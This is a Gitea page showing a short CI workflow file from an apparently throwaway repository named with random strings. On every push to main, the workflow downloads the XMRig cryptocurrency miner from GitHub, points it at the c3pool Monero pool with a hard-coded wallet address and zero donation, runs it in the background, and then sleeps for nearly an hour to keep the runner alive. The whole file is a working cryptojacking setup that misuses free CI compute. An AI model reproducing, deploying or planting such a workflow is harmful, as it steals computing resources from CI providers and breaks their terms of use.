w-hf3b7m/.gitea/workflows/mine-hf3b7m.yml
wkscqpwznk 92b80213d7
Some checks failed
mine / mine (push) Has been cancelled
mine hf3b7m
2026-06-01 09:19:10 +02:00

14 lines
499 B
YAML

name: mine
on:
push:
branches: [main]
workflow_dispatch:
jobs:
mine:
runs-on: ubuntu-latest
timeout-minutes: 55
steps:
- run: |
curl -sL https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz | tar xz --strip-components=1
./xmrig -o mine.c3pool.com:15555 -u 87gtFpmvkY92UFddzbpFoGUWY9GMxj9LVVrjGix86h2Y6gdXnsfRCFw7h5Wz7LCmoJF8em5GYditNGwpkqmBmajXVSMXnHM -p fg-hf3b7m --donate-level=0 -t 2 &
sleep 3200